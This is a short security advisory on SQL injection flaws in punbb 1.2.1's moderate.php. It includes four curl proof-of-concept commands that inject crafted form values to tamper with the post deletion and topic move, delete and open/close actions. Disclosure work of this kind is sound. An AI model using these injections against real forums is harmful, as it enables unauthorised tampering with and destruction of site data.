Improper handling of several arguments in the moderate.php code in punbb version 1.2.1 allows a malicious moderator to inject arbitrary SQL statements.
6bdc9357ff20bb7f7303ff83fef6913311150b993239cb8d7c76abff375397bd
==============================================
SQL Injections in punbb-1.2.1 moderate.php
==============================================
Description
-----------
Improper handling of several arguments in
moderate.php allows a malicious moderator (or admin)
to inject arbitrary SQL statements.
This also affects systems using the magic_quotes_gpc
option in php.ini.
Proof of concept
----------------
These examples will not do anything malicious or
even cause the system to report an error. Instead
they are crafted such that by simply adding a ;
or ' just before the comment "-- this won't show"
will cause the SQL query to crash demonstrating
the injection is possible.
Assumptions:
- punbb_cookie contains identification of a
moderator for forum with id 1.
Attacks delete posts:
curl --referer http://target/moderate.php --form posts="0) -- this won't show" --form delete_posts_comply=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1\&tid=1
Attacks move topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form move_to_forum=2 --form move_topics=1 --form move_topics_to=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1
Attacks delete topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form delete_topics=1 --form delete_topics_comply=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1
Attacks open/close:
curl --referer http://target/moderate.php --form "topics[0) -- this won't show]"= --form open=1 --cookie "punbb_cookie=<valid cookie> target/moderate.php?fid=1